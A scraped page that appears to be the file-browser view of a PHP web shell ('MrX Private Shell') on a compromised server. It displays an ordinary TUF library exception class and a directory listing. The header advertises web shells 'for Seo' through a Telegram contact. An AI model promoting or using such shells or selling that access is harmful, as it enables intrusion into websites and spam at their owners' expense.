__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Tuf\Exception;
/**
* Indicates an input was not in the required format to be interpreted.
*/
class FormatException extends TufException
{
/**
* Constructs the exception.
*
* @param string $malformedValue
* The malformed value string that caused the exception.
* @param string $message
* (optional) The exception message to use. If blank, a default message
* will be used.
* @param \Throwable|null $previous
* (optional) The previous exception, if any, for exception chaining.
*/
public function __construct(string $malformedValue, string $message = "", \Throwable $previous = null)
{
if (empty($message)) {
$message = 'Bad format';
}
$message = $message . sprintf(": %s", $malformedValue);
parent::__construct($message, 0, $previous);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Attack | Folder | 0775 |
|
|
| DownloadSizeException.php | File | 163 B | 0664 |
|
| FormatException.php | File | 887 B | 0664 |
|
| InvalidKeyException.php | File | 145 B | 0664 |
|
| MetadataException.php | File | 132 B | 0664 |
|
| NotFoundException.php | File | 988 B | 0664 |
|
| RepoFileNotFound.php | File | 145 B | 0664 |
|
| TufException.php | File | 154 B | 0664 |
|